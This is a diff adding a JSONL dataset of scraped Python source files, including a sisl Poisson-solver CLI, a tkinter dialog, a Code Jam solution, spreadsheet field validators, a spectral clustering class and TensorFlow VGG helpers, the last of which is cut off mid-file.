diff --git "a/3720.jsonl" "b/3720.jsonl" new file mode 100644--- /dev/null +++ "b/3720.jsonl" @@ -0,0 +1,753 @@ +{"seq_id":"4256418184","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\nr\"\"\" Hartree correction for FFT-Poisson solver for arbitrary electrode positions\n\nDeveloper: Nick Papior\nContact: nickpapior gmail.com\nsisl-version: >=0.9.3\n\nThis Poisson solver uses pyamg to calculate an initial guess for the Poisson\nsolution to correct the FFT solution. It does this by setting up boundary\nconditions on electrodes and then solving the Hartree potential using multi-grid\nsolvers.\n\nIt requires two inputs and has several optional flags.\n\n- The siesta.TBT.nc file which contains the geometry that is to be calculated for\n The reason for using the siesta.TBT.nc file is the ease of use:\n\n The siesta.TBT.nc contains electrode atoms and device atoms. Hence it\n becomes easy to read in the electrode atomic positions.\n Note that since you'll always do a 0 V calculation it is easy to\n do a 0 bias calculation first, then create a guess using this script,\n and finally do bias calculations.\n\n- The grid size of the simulation grid, this needs to be commensurate with the\n actual Siesta grid used.\n\nThis script is a command-line utility with several options (please refer to\n--help). There are a few important flags you should know about:\n\n --tolerance [tol] specify the tolerance of the solution, the tighter the longer solution time\n --pyamg-shape [nx ny nz] shape for which the solution is calculated (impacts speed)\n --shape [nx ny nz] final shape of the solution, if pyamg-shape is not the same the solution will be interpolated (order=2)\n --dtype [f|d] the data-type used to solve the Poisson equation\n --out [file] any sisl compatible grid file, please at least do --out V.TSV.nc which is compatible with TranSiesta.\n\nThis tool requires the following packages:\n- pyamg\n\nKnown problems:\n- The pyamg solver requires quite a bit of memory, you should preferentially select\n the largest grid (up to the actual grid size you want) possible.\n- The Neumann implementation in the boundary conditions is not correct, hence\n it may never converge (or produce nan's). If this happens please try another\n boundary condition.\n- It may not always converge which requires some fine-tuning of the tolerances,\n secondly it may converge too fast so the solution is not really good.\n\"\"\"\nimport argparse as argp\nimport os\nimport sys\nfrom pathlib import Path\n\nimport numpy as np\n\nimport sisl as si\n\n__all__ = [\"pyamg_solve\", \"solve_poisson\", \"fftpoisson_fix_cli\", \"fftpoisson_fix_run\"]\n\n\n_BC = si.BoundaryCondition\n\n# Base-script name\n_script = Path(sys.argv[0]).name\n\n_DEBUG = os.environ.get(\"SISL_TS_FFT_DEBUG\", \"False\")\n# Determine from env-var whether we should use debug mode\n_DEBUG = _DEBUG.lower() in (\"true\", \"t\", \"1\", \"y\", \"yes\", \"on\")\n\n\ndef pyamg_solve(A, b, tolerance=1e-12, accel=None, title=\"\"):\n import pyamg\n\n print(f\"\\nSetting up pyamg solver... {title}\")\n ml = pyamg.aggregation.smoothed_aggregation_solver(A, max_levels=1000)\n del A\n print(ml)\n residuals = []\n\n def callback(x):\n # residuals calculated in the solve function is a pre-conditioned residual\n # residuals.append(np.linalg.norm(b - A.dot(x)) ** 0.5)\n print(\n \" {:4d} residual = {:.5e} x0-residual = {:.5e}\".format(\n len(residuals) - 1, residuals[-1], residuals[-1] / residuals[0]\n )\n )\n\n x = ml.solve(\n b,\n tol=tolerance,\n callback=callback,\n residuals=residuals,\n accel=accel,\n cycle=\"W\",\n maxiter=1e7,\n )\n print(\"Done solving the Poisson equation!\")\n return x\n\n\ndef solve_poisson(\n geometry,\n shape,\n radius=\"empirical\",\n dtype=np.float64,\n tolerance=1e-8,\n accel=None,\n boundary_fft=True,\n device_val=None,\n plot_boundary=False,\n box=False,\n boundary=None,\n **elecs_V,\n):\n \"\"\"Solve Poisson equation\"\"\"\n error = False\n elecs = []\n for name in geometry.names:\n if (\"+\" in name) or (name in [\"Buffer\", \"Device\"]):\n continue\n\n # This is actually an electrode\n elecs.append(name)\n error = error or (name not in elecs_V)\n\n if len(elecs) == 0:\n raise ValueError(f\"{_script}: Could not find any electrodes in the geometry.\")\n\n error = error or len(elecs) != len(elecs_V)\n if error:\n for name in elecs:\n if not name in elecs_V:\n print(f\" missing electrode bias: {name}\")\n raise ValueError(\n f\"{_script}: Missing electrode arguments for specifying the bias.\"\n )\n\n if boundary is None:\n bc = [[_BC.PERIODIC, _BC.PERIODIC] for _ in range(3)]\n else:\n bc = []\n\n def bc2bc(s):\n return {\n \"periodic\": \"PERIODIC\",\n \"p\": \"PERIODIC\",\n _BC.PERIODIC: \"PERIODIC\",\n \"dirichlet\": \"DIRICHLET\",\n \"d\": \"DIRICHLET\",\n _BC.DIRICHLET: \"DIRICHLET\",\n \"neumann\": \"NEUMANN\",\n \"n\": \"NEUMANN\",\n _BC.NEUMANN: \"NEUMANN\",\n }.get(s.lower(), s.upper())\n\n for bottom, top in boundary:\n bc.append([getattr(_BC, bc2bc(bottom)), getattr(_BC, bc2bc(top))])\n if len(bc) != 3:\n raise ValueError(\n f\"{_script}: Requires a 3x2 list input for the boundary conditions.\"\n )\n\n def _create_shape_tree(xyz, A, B=None):\n \"\"\"Takes two lists A and B which returns a shape with a binary nesting\n\n This makes further index handling much faster.\n \"\"\"\n if B is None or len(B) == 0:\n return _create_shape_tree(xyz, *np.array_split(A, 2))\n\n AA, BB = None, None\n if len(A) == 1:\n AA = si.Sphere(radius, xyz[A[0]])\n if len(B) == 0:\n return AA\n\n if len(B) == 1:\n BB = si.Sphere(radius, xyz[B[0]])\n if len(A) == 0:\n return BB\n\n # Quick return if these are the final ones\n if AA and BB:\n return AA | BB\n\n if not AA:\n AA = _create_shape_tree(xyz, *np.array_split(A, 2))\n if not BB:\n BB = _create_shape_tree(xyz, *np.array_split(B, 2))\n\n return AA | BB\n\n # Create grid\n geometry.set_boundary_condition(bc)\n grid = si.Grid(shape, geometry=geometry, dtype=dtype)\n\n class _fake:\n @property\n def shape(self):\n return shape\n\n @property\n def dtype(self):\n return dtype\n\n # Fake the grid to reduce memory requirement\n grid.grid = _fake()\n\n # Construct matrices we need to specify the boundary conditions on\n A, b = grid.topyamg()\n\n # Short-hand notation\n xyz = geometry.xyz\n\n if not device_val is None:\n print(f\"\\nApplying device potential = {device_val}\")\n idx = geometry.names[\"Device\"]\n device = _create_shape_tree(xyz, idx)\n idx = grid.index_truncate(grid.index(device))\n idx = grid.pyamg_index(idx)\n grid.pyamg_fix(A, b, idx, device_val)\n\n # Apply electrode constants\n print(\"\\nApplying electrode potentials\")\n for i, elec in enumerate(elecs):\n V = elecs_V[elec]\n print(f\" - {elec} = {V}\")\n\n idx = geometry.names[elec]\n elec_shape = _create_shape_tree(xyz, idx)\n\n idx = grid.index_truncate(grid.index(elec_shape))\n idx = grid.pyamg_index(idx)\n grid.pyamg_fix(A, b, idx, V)\n del idx, elec_shape\n\n # Now we have initialized both A and b with correct boundary conditions\n # Lets solve the Poisson equation!\n if box:\n # No point in solving the boundary problem if requesting a box\n boundary_fft = False\n grid.grid = b.reshape(shape)\n del A\n else:\n x = pyamg_solve(\n A,\n b,\n tolerance=tolerance,\n accel=accel,\n title=\"solving electrode boundary conditions\",\n )\n grid.grid = x.reshape(shape)\n\n del A, b\n\n if boundary_fft:\n # Change boundaries to always use dirichlet\n # This ensures that once we set the boundaries we don't\n # get any side-effects\n BC = si.BoundaryCondition\n periodic = [\n bc == BC.PERIODIC or geometry.nsc[i] > 1\n for i, bc in enumerate(grid.lattice.boundary_condition[:, 0])\n ]\n bc = np.repeat(np.array([BC.DIRICHLET], np.int32), 6).reshape(3, 2)\n for i in (0, 1, 2):\n if periodic[i]:\n bc[i, :] = BC.PERIODIC\n grid.set_bc(bc)\n A, b = grid.topyamg()\n\n # Solve only for the boundary fixed\n def sl2idx(grid, sl):\n return grid.pyamg_index(grid.mgrid(sl))\n\n # Create slices\n sl = [slice(0, g) for g in grid.shape]\n\n # One boundary at a time\n for i in (0, 1, 2):\n if periodic[i]:\n continue\n new_sl = sl[:]\n new_sl[i] = slice(0, 1)\n idx = sl2idx(grid, new_sl)\n grid.pyamg_fix(\n A, b, idx, grid.grid[new_sl[0], new_sl[1], new_sl[2]].reshape(-1)\n )\n new_sl[i] = slice(grid.shape[i] - 1, grid.shape[i])\n idx = sl2idx(grid, new_sl)\n grid.pyamg_fix(\n A, b, idx, grid.grid[new_sl[0], new_sl[1], new_sl[2]].reshape(-1)\n )\n\n if plot_boundary:\n dat = b.reshape(*grid.shape)\n # now plot every plane\n import matplotlib.pyplot as plt\n\n slicex3 = np.index_exp[:] * 3\n axs = [\n np.linspace(0, grid.lattice.length[ax], shape, endpoint=False)\n for ax, shape in enumerate(grid.shape)\n ]\n\n for i in (0, 1, 2):\n idx = list(slicex3)\n j = (i + 1) % 3\n k = (i + 2) % 3\n if i > j:\n i, j = j, i\n X, Y = np.meshgrid(axs[i], axs[j])\n\n for v, head in ((0, \"bottom\"), (-1, \"top\")):\n plt.figure()\n plt.title(f\"axis: {'ABC'[k]} ({head})\")\n idx[k] = v\n plt.contourf(X, Y, dat[tuple(idx)].T)\n plt.xlabel(f\"Distance along {'ABC'[i]} [Ang]\")\n plt.ylabel(f\"Distance along {'ABC'[j]} [Ang]\")\n plt.colorbar()\n\n plt.show()\n\n grid.grid = _fake()\n x = pyamg_solve(\n A,\n b,\n tolerance=tolerance,\n accel=accel,\n title=\"removing electrode boundaries and solving for edge fixing\",\n )\n\n grid.grid = x.reshape(shape)\n del A, b\n\n return grid\n\n\ndef fftpoisson_fix_cli(subp=None):\n is_sub = not subp is None\n\n title = \"FFT Poisson corrections for TranSiesta calculations for arbitrary number of electrodes.\"\n if is_sub:\n global _script\n _script = f\"{_script} ts-fft\"\n p = subp.add_parser(\"ts-fft\", description=title, help=title)\n else:\n p = argp.ArgumentParser(title)\n\n tuning = p.add_argument_group(\n \"tuning\", \"Tuning fine details of the Poisson calculation.\"\n )\n\n p.add_argument(\n \"--geometry\",\n \"-G\",\n default=\"siesta.TBT.nc\",\n metavar=\"FILE\",\n help=\"siesta.TBT.nc file which contains the geometry and electrode information, currently we cannot read that from fdf-files.\",\n )\n\n p.add_argument(\n \"--shape\",\n \"-s\",\n nargs=3,\n type=int,\n required=True,\n metavar=(\"A\", \"B\", \"C\"),\n help=\"Grid shape, this *has* to be conforming to the TranSiesta calculation, read from output: 'InitMesh: MESH = A x B x C'\",\n )\n\n n = {\"a\": \"first\", \"b\": \"second\", \"c\": \"third\"}\n for d in \"abc\":\n p.add_argument(\n f\"--boundary-condition-{d}\",\n f\"-bc-{d}\",\n nargs=2,\n type=str,\n default=[\"p\", \"p\"],\n metavar=(\"BOTTOM\", \"TOP\"),\n help=(\n \"Boundary condition along the {} lattice vector [periodic/p, neumann/n, dirichlet/d]. \"\n \"Specify separate BC at the start and end of the lattice vector, respectively.\".format(\n n[d]\n )\n ),\n )\n\n p.add_argument(\n \"--elec-V\",\n \"-V\",\n action=\"append\",\n nargs=2,\n metavar=(\"NAME\", \"V\"),\n default=[],\n help=\"Specify chemical potential on electrode\",\n )\n\n p.add_argument(\n \"--pyamg-shape\",\n \"-ps\",\n nargs=3,\n type=int,\n metavar=(\"A\", \"B\", \"C\"),\n default=None,\n help=\"Grid used to solve the Poisson equation, if shape is different the Grid will be interpolated (order=2) after.\",\n )\n\n p.add_argument(\n \"--device\",\n \"-D\",\n type=float,\n default=None,\n metavar=\"VAL\",\n help=\"Fix the value of all device atoms to a value. In some cases this turns out to yield a better box boundary. The default is to *not* fix the potential on the device atoms.\",\n )\n\n tuning.add_argument(\n \"--radius\",\n \"-R\",\n type=float,\n default=3.0,\n metavar=\"R\",\n help=(\n \"Radius of atoms when figuring out the electrode sizes, this corresponds to the extend of \"\n \"each electrode where boundary conditions are fixed. Should be tuned according to the atomic species [3 Ang]\"\n ),\n )\n\n tuning.add_argument(\n \"--dtype\",\n \"-d\",\n choices=[\"d\", \"f64\", \"f\", \"f32\"],\n default=\"d\",\n help=\"Precision of data (d/f64==double, f/f32==single)\",\n )\n\n tuning.add_argument(\n \"--tolerance\",\n \"-T\",\n type=float,\n default=1e-7,\n metavar=\"EPS\",\n help=\"Precision required for the pyamg solver. NOTE when using single precision arrays this should probably be on the order of 1e-5\",\n )\n\n tuning.add_argument(\n \"--acceleration\",\n \"-A\",\n dest=\"accel\",\n default=\"cg\",\n metavar=\"METHOD\",\n help=\"\"\"Acceleration method for pyamg. May be useful if it fails to converge\n\nTry one of: cg, gmres, fgmres, cr, cgnr, cgne, bicgstab, steepest_descent, minimal_residual\"\"\",\n )\n\n test = p.add_argument_group(\n \"testing\",\n \"Options used for testing output. None of these options should be used for production runs!\",\n )\n test.add_argument(\n \"--box\",\n dest=\"box\",\n action=\"store_true\",\n default=False,\n help=\"Only store the initial box solution (i.e. do not run PyAMG)\",\n )\n\n test.add_argument(\n \"--no-boundary-fft\",\n action=\"store_false\",\n dest=\"boundary_fft\",\n default=True,\n help=\"Once the electrode boundary conditions are solved we perform a second solution with boundaries fixed. Using this flag disables this second solution.\",\n )\n\n if _DEBUG:\n test.add_argument(\n \"--plot\",\n dest=\"plot\",\n default=None,\n type=int,\n help=\"Plot grid by averaging over the axis given as argument\",\n )\n\n test.add_argument(\n \"--plot-boundary\",\n dest=\"plot_boundary\",\n action=\"store_true\",\n help=\"Plot all 6 edges of the box with their fixed values (just before 2nd pyamg solve step)\",\n )\n\n p.add_argument(\n \"--out\",\n \"-o\",\n action=\"append\",\n default=None,\n help=\"Output file to store the resulting Poisson solution. It *has* to have TSV.nc file ending to make the file conforming with TranSiesta.\",\n )\n\n if is_sub:\n p.set_defaults(runner=fftpoisson_fix_run)\n else:\n fftpoisson_fix_run(p.parse_args())\n\n\ndef fftpoisson_fix_run(args):\n if args.out is None:\n print(\n f\">\\n>\\n>{_script}: No out-files has been specified, work will be carried out but not saved!\\n>\\n>\\n\"\n )\n\n # Read in geometry\n geometry = si.get_sile(args.geometry).read_geometry()\n\n # Figure out the electrodes\n elecs_V = {}\n if len(args.elec_V) == 0:\n print(geometry.names)\n raise ValueError(\n f\"{_script}: Please specify all electrode potentials using --elec-V\"\n )\n\n for name, V in args.elec_V:\n elecs_V[name] = float(V)\n\n if args.dtype.lower() in (\"f\", \"f32\"):\n dtype = np.float32\n elif args.dtype.lower() in (\"d\", \"f64\"):\n dtype = np.float64\n\n # Now we can solve Poisson\n if args.pyamg_shape is None:\n shape = args.shape\n else:\n shape = args.pyamg_shape\n\n # Create the boundary conditions\n boundary = []\n boundary.append(args.boundary_condition_a)\n boundary.append(args.boundary_condition_b)\n boundary.append(args.boundary_condition_c)\n\n V = solve_poisson(\n geometry,\n shape,\n radius=args.radius,\n boundary=boundary,\n dtype=dtype,\n tolerance=args.tolerance,\n box=args.box,\n accel=args.accel,\n boundary_fft=args.boundary_fft,\n device_val=args.device,\n plot_boundary=args.plot_boundary,\n **elecs_V,\n )\n\n if _DEBUG:\n if not args.plot is None:\n dat = V.average(args.plot)\n import matplotlib.pyplot as plt\n\n axs = [\n np.linspace(0, V.lattice.length[ax], shape, endpoint=False)\n for ax, shape in enumerate(V.shape)\n ]\n idx = list(range(3))\n\n # Now plot data\n del axs[args.plot]\n del idx[args.plot]\n\n X, Y = np.meshgrid(*axs)\n plt.contourf(X, Y, np.squeeze(dat.grid).T)\n plt.colorbar()\n plt.title(f\"Averaged over {'ABC'[args.plot]} axis\")\n plt.xlabel(f\"Distance along {'ABC'[idx[0]]} [Ang]\")\n plt.ylabel(f\"Distance along {'ABC'[idx[1]]} [Ang]\")\n plt.show()\n\n if np.any(np.array(args.shape) != np.array(V.shape)):\n print(\"\\nInterpolating the solution...\")\n V = V.interp(args.shape, 2)\n print(\"Done interpolating!\")\n\n print(\"\")\n # Write solution to the output\n if not args.out is None:\n for out in args.out:\n print(f\"Writing to file: {out}...\")\n V.write(out)\n\n\nif __name__ == \"__main__\":\n fftpoisson_fix_cli()\n","repo_name":"zerothi/sisl","sub_path":"src/sisl_toolbox/transiesta/poisson/fftpoisson_fix.py","file_name":"fftpoisson_fix.py","file_ext":"py","file_size_in_byte":18437,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"61"} +{"seq_id":"11522950154","text":"from MasyuDialog import *\nimport tkinter as tk\n\n# Dialog displayed when a solution cannot be found\n# for the current puzzle.\nclass NoSolutionDialog(MasyuDialog):\n # Class constructor\n\n def __init__(self, parentWindow):\n super().__init__(parentWindow)\n self.__topLevel = None\n\n def okHandler(self):\n self.__topLevel.destroy()\n\n def showDialog(self):\n toplevel = tk.Toplevel()\n toplevel.resizable(0, 0)\n self.__topLevel = toplevel\n\n toplevel.title('No solution found')\n\n l1 = tk.Label(toplevel, image=\"::tk::icons::warning\")\n l1.grid(row=0, column=0, pady=(7, 0), padx=(10, 30), sticky=\"e\")\n l2 = tk.Label(toplevel, text='Unable to find a solution')\n l2.grid(row=0, column=1, columnspan=4, padx=(0, 30), pady=(7, 10), sticky=\"w\")\n\n b2 = tk.Button(toplevel, text=\"OK\", command=self.okHandler, width=10)\n b2.grid(row=1, column=2, padx=(2, 35), pady=(0, 15), sticky=\"e\")\n\n super().showDialog(toplevel)","repo_name":"fredtaft/MasyuSolver","sub_path":"NoSolutionDialog.py","file_name":"NoSolutionDialog.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23457576371","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\ndef solve(smax, sstr):\n friends = 0\n up = 0\n for k, digit in enumerate(sstr):\n digit = int(digit)\n if digit > 0 and up < k:\n new_friends = k - up\n up += new_friends\n friends += new_friends\n up += digit\n return friends\n\n\nif __name__ == \"__main__\":\n testcases = int(raw_input())\n\n for caseNr in range(1, testcases+1):\n smax, sstr = raw_input().split(\" \")\n print(\"Case #%i: %s\" % (caseNr, solve(smax, sstr)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/882.py","file_name":"882.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"744902879","text":"# pylint: disable=anomalous-backslash-in-string\n'''This module contains agnostic validation functions.'''\n\nimport re\n\nfrom datetime import datetime\nfrom xlrd import xldate_as_tuple\n\n# Enum values used in the spreadsheet.\n_LEASING_STATUS = [u'LEASED', u'LEASED - M2M', u'RENO', u'REHAB', u'VACANT - ADVERT', u'VACANT - PENDING', u'VACANT - TRANSITION', u'N/A']\n_CLASS_OF_SPACE = [u'A', u'B', u'C']\n_OWNER_ESTIMATE_SOURCES = [u'INTERNAL AVM', u'EXTERNAL BPO', u'N/A']\n_US_STATES_SHORT = [u'AL', u'AK', u'AZ', u'AR', u'AS', u'CA', u'CO', u'CT', u'DC', u'DE', u'FL', u'GA', u'GU', u'HI', u'ID', u'IL', u'IN', u'IA',\n u'KS', u'KY', u'LA', u'ME', u'MD', u'MA', u'MI', u'MN', u'MP', u'MS', u'MO', u'MT', u'NE', u'NV', u'NH', u'NJ', u'NM', u'NY', u'NC',\n u'ND', u'OH', u'OK', u'OR', u'PA', u'PR', u'RI', u'SC', u'SD', u'TN', u'TX', u'UT', u'VT', u'VA', u'VI', u'WA', u'WV', u'WI', u'WY']\n_US_STATES_LONG = [u'ALASKA', u'ALABAMA', u'ARKANSAS', u'AMERICAN SAMOA', u'ARIZONA', u'CALIFORNIA', u'COLORADO', u'CONNECTICUT', u'DISTRICT OF COLUMBIA',\n u'DELAWARE', u'FLORIDA', u'GEORGIA', u'GUAM', u'HAWAII', u'IOWA', u'IDAHO', u'ILLINOIS', u'INDIANA', u'KANSAS', u'KENTUCKY', u'LOUISIANA',\n u'MASSACHUSETTS', u'MARYLAND', u'MAINE', u'MICHIGAN', u'MINNESOTA', u'MISSOURI', u'NORTHERN MARIANA ISLANDS', u'MISSISSIPPI', u'MONTANA',\n u'NATIONAL', u'NORTH CAROLINA', u'NORTH DAKOTA', u'NEBRASKA', u'NEW HAMPSHIRE', u'NEW JERSEY', u'NEW MEXICO', u'NEVADA', u'NEW YORK',\n u'OHIO', u'OKLAHOMA', u'OREGON', u'PENNSYLVANIA', u'PUERTO RICO', u'RHODE ISLAND', u'SOUTH CAROLINA', u'SOUTH DAKOTA' 'TENNESSEE', u'TEXAS',\n u'UTAH', u'VIRGINIA', u'VIRGIN ISLANDS', u'VERMONT', u'WASHINGTON', u'WISCONSIN', u'WEST VIRGINIA', u'WYOMING']\n\n\ndef _check_regex_field(regex, field):\n '''Check if specified regex matches given field.'''\n regex_object = re.compile(regex)\n # Need to stringify the field, because it might be a number.\n result = re.match(regex_object, str(field))\n if not result:\n return (False, 'Invalid character or format.')\n return (True, None)\n\n\n# Cell type validation functions.\ndef valid_date(field):\n '''Check for a valid date field.'''\n # Excel uses floats for storing dates. If that alone wasn't a bad idea, there are two base date systems. We assume we are using the default, 1900-one here.\n # xlrd module provides this handy snippet for transforming dates. Rely on it for correctness.\n try:\n xldate_as_tuple(field, 0)\n except ValueError:\n # Try parsing it directly using datetime.strptime instead.\n date_formats = ['%d/%m/%Y', '%d/%b/%Y', '%Y/%m/%d', '%Y/%b/%d', '%d-%m-%Y', '%d-%b-%Y', '%Y-%m-%d', '%Y-%b-%d']\n for date_format in date_formats:\n try:\n datetime.strptime(field, date_format)\n return (True, None)\n except ValueError:\n pass\n return (False, 'Invalid date.')\n return (True, None)\n\n\ndef valid_percentage(field, precision=None):\n '''Check for a valid percentage field.'''\n # Eg. 8.00%, 8%, 0.08\n try:\n value = float(field)\n except ValueError:\n # Due to formatting issues need to concatenate %$ separately.\n percentage_regex = ('^\\d+\\.\\d{%d}' % precision + '%$') if precision else '^\\d+(.\\d+)?%$'\n result, errors = _check_regex_field(percentage_regex, field)\n if not result:\n return (False, errors)\n value = float(field[:-1])\n # Check for 0-100 bounds.\n if not 0.0 <= value <= 100.0:\n return (False, 'Percentage outside 0-100 bounds.')\n return (True, None)\n\n\ndef valid_dollar(field, precision=None):\n '''Check for a valid dollar field.'''\n # Eg. $3,950, $3,950.00, 3950.0\n try:\n float(field)\n except ValueError:\n value = field\n # Check for valid currency mark.\n if field.startswith('$'):\n value = field[1:]\n elif field.endswith('USD'):\n value = field[:-3]\n # Replace kilo delimiters.\n value = value.replace(',', '')\n # Try to convert it again without all the extra chars.\n try:\n float(value)\n except ValueError:\n return (False, 'Invalid dollar value.')\n if precision is not None:\n dollar_regex = '^\\d+(\\.\\d{%d})$' % precision\n result, _ = _check_regex_field(dollar_regex, value)\n if not result:\n return (False, 'Invalid precision.')\n return (True, None)\n\n\ndef valid_year(field):\n '''Check if year built field is valid.'''\n # Excel saves most numbers as float, try to check that too.\n # Eg. 2001, 2001.0\n year_regex = '^\\d{4}(.0)?$'\n return _check_regex_field(year_regex, field)\n\n\ndef valid_address(field):\n '''Check if address field is valid.'''\n # Eg. 789 Main Str Unit C\n address_regex = '^[ ]*\\w[ \\-,\\'\\w]+$'\n return _check_regex_field(address_regex, field)\n\n\ndef valid_city(field):\n '''Check if city field is valid.'''\n # Eg. New Reno\n city_regex = '^[ \\-\\'\\w]+$'\n return _check_regex_field(city_regex, field)\n\n\ndef valid_county(field):\n '''Check if county field is valid.'''\n # Eg. McPherson County\n county_regex = '^[ \\-\\'\\w]+$'\n return _check_regex_field(county_regex, field)\n\n\ndef valid_zip_code(field):\n '''Check if ZIP code field is valid.'''\n # Excel saves most numbers as float, try to check that too.\n # Eg. 56789, 56789.0, 45562-2544\n zip_regex = '^\\d{5}((.0)?|(-\\d{4}))?$'\n return _check_regex_field(zip_regex, field)\n\n\ndef valid_us_state(field):\n '''Check for a valid enum in a state field.'''\n if field.upper() not in _US_STATES_SHORT and field.upper() not in _US_STATES_LONG:\n return (False, 'No such US state: %s.' % field)\n return (True, None)\n\n\ndef valid_estimate_source(field):\n '''Check for a valid enum in a owner estimate source field.'''\n if field.upper() not in _OWNER_ESTIMATE_SOURCES:\n return (False, 'No such owner estimate source: %s.' % field)\n return (True, None)\n\n\ndef valid_leasing_status(field):\n '''Check for a valid enum in a leasing status field.'''\n if field.upper() not in _LEASING_STATUS:\n return (False, 'No such leasing status: %s.' % field)\n return (True, None)\n\n\ndef valid_class_of_space(field):\n '''Check for a valid enum in a leasing status field.'''\n if field.upper() not in _CLASS_OF_SPACE:\n return (False, 'No such class of space %s.' % field)\n return (True, None)\n\n\ndef valid_integer(field, min_value=None, max_value=None):\n '''Check for integer field.'''\n try:\n int(field)\n except ValueError:\n return (False, 'Not an integer: %s.' % field)\n value = int(field)\n # Perform bounds check.\n if min_value is not None and min_value > value:\n return (False, 'Integer outside of min bounds: %d.' % value)\n if max_value is not None and max_value < value:\n return (False, 'Integer outside of max bounds: %d.' % value)\n return (True, None)\n\n\ndef valid_float(field, min_value=None, max_value=None, precision=None):\n '''Check for float field.'''\n try:\n float(field)\n except ValueError:\n return (False, 'Not a float: %s.' % field)\n value = float(field)\n # Check for precision.\n if precision is not None:\n float_regex = ('^\\d+\\.\\d{%d}$' % precision) if precision else '^\\d+$'\n result, _ = _check_regex_field(float_regex, field)\n if not result:\n return (False, 'Precision does not match.')\n # Perform bounds check.\n if min_value is not None and min_value > value:\n return (False, 'Float outside of min bounds: %f.' % value)\n if max_value is not None and max_value < value:\n return (False, 'Float outside of max bounds: %f.' % value)\n return (True, None)\n","repo_name":"Millz0r/daedalus","sub_path":"daedalus/validation/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":7894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5619188385","text":"import numpy as np\nclass Spectral_Cluestering:\n def __init__(self, k, sigma):\n self.k = k\n self.sigma = sigma\n self.y = None\n\n def make_graph(self, X, S): # X is raw data\n affinity_matrix = np.zeros((X.shape[0], X.shape[0]))\n for i in range(X.shape[0]):\n for j in range(X.shape[0]):\n distances = np.linalg.norm(X[i] - X[j]) ** 2\n affinity_matrix[i][j] = np.exp(-distances / (S ** 2))\n # return np.fill_diagonal(affinity_matrix, 0)\n return affinity_matrix\n\n def laplasian_matrix(self, X, W, k):\n D = np.zeros((X.shape[0], X.shape[0]))\n I = np.ones((X.shape[0], X.shape[0]))\n d_s = W.sum(axis=1)\n d = []\n for i in range(d_s.size):\n d.append(float(d_s[i]))\n\n np.fill_diagonal(D, d)\n\n # if W has elements that are equal to zero, the corresponding elements in\n # D will also be zero, causing division by zero and resulting in NaN values in the L_sym matrix\n\n D_inv_sqrt = np.linalg.inv(np.sqrt(D + np.finfo(float).eps)) # add small constant to diagonal\n L_sym = D_inv_sqrt.dot(D - W).dot(D_inv_sqrt)\n\n # compute the first k eingrnvectors of L\n\n eigenvalues, eigenvectors = np.linalg.eig(L_sym)\n eigenvectors = eigenvectors[:, :k]\n U = np.vstack([eigenvectors[:, i] for i in range(k)])\n return U\n\n def fit(self, X):\n w = self.make_graph(X, self.sigma)\n U = self.laplasian_matrix(X, w, self.k)\n\n self.y = np.zeros((U.shape[0], U.shape[1]))\n for i in range(U.shape[0]):\n self.y = U[i, :]\n\n def predict(self, X):\n\n data = self.y\n from sklearn.cluster import KMeans\n kmeans = KMeans(n_clusters=self.k)\n data = data.reshape(-1, 1)\n kmeans.fit(data)\n labels = kmeans.labels_\n\n return labels","repo_name":"khAsya402/ML_practice","sub_path":"spectral.py","file_name":"spectral.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12905074775","text":"\n\nimport tensorflow as tf\nimport numpy as np\n\nvgg_param = np.load('vgg16.npy',encoding = 'latin1',allow_pickle = True).item()\n\ndef vgg_conv(x,name,trainable = False):\n with tf.variable_scope(name):\n if trainable :\n gene_fn = tf.Variable\n else:\n gene_fn = tf.constant\n return tf.nn.relu(tf.nn.bias_add(\n tf.nn.conv2d(x,gene_fn(vgg_param[name][0],dtype = tf.float32),\n (1,1,1,1),padding = 'SAME',name = name),\n gene_fn(vgg_param[name][1],dtype = tf.float32)))\n \n \ndef vgg_pool(x,name):\n with tf.variable_scope(name):\n return tf.nn.max_pool(x,\n ksize=[1,2, 2 , 1],\n strides=[1, 2, 2, 1],\n padding='SAME',\n name=name)\n \ndef conv(input_tensor, name, kw, kh, n_out, dw=1, dh=1, activation_fn=tf.nn.relu,trainable = True):\n\n n_in = input_tensor.get_shape()[-1].value\n with tf.variable_scope(name):\n if trainable :\n gene_fn = tf.Variable\n else:\n gene_fn = tf.constant\n weights = gene_fn(tf.truncated_normal(shape=(kh, kw, n_in, n_out), mean = 0.0,stddev=0.1), dtype=tf.float32, name='weights')\n biases = gene_fn(tf.constant(0.0, shape=[n_out]), dtype=tf.float32, name='biases')\n conv = tf.nn.conv2d(input_tensor, weights, (1, dh, dw, 1), padding='SAME')\n if activation_fn :\n activation = activation_fn(tf.nn.bias_add(conv, biases))\n else:\n activation = tf.nn.bias_add(conv,biases)\n tf.summary.histogram(\"weights\", weights)\n return activation\n \ndef deconv(input_tensor,name ,kw,kh,n_out,out_shape ,dw=2,dh=2,activation_fn=tf.nn.leaky_relu):\n \"这是反卷积\"\n n_in = input_tensor.get_shape()[-1].value\n\n #因为直接作为numpy数组来的话,似乎全都拿不到,这样的话,我至少自己指定最后一维,第一维他会自己拿到,但,,emm我怀疑会出问题\n \n with tf.variable_scope(name):\n weights = tf.Variable(tf.truncated_normal(shape = (kh,kw,n_out,n_in),stddev = 0.01),dtype = tf.float32,name = 'weights')\n #biases = tf.Variable(tf.constant(0.0,shape = [n_out]),dtype = tf.float32,name = 'biases')\n deconv_t = tf.nn.conv2d_transpose(input_tensor,weights,out_shape ,strides = (1,dh,dw,1),padding = 'SAME' )\n #conv2d_transpose(value, filter, output_shape, strides, padding=\"SAME\", \n # data_format=\"NHWC\", name=None)\n return deconv_t\n \ndef pool(input_tensor, name, kh, kw, 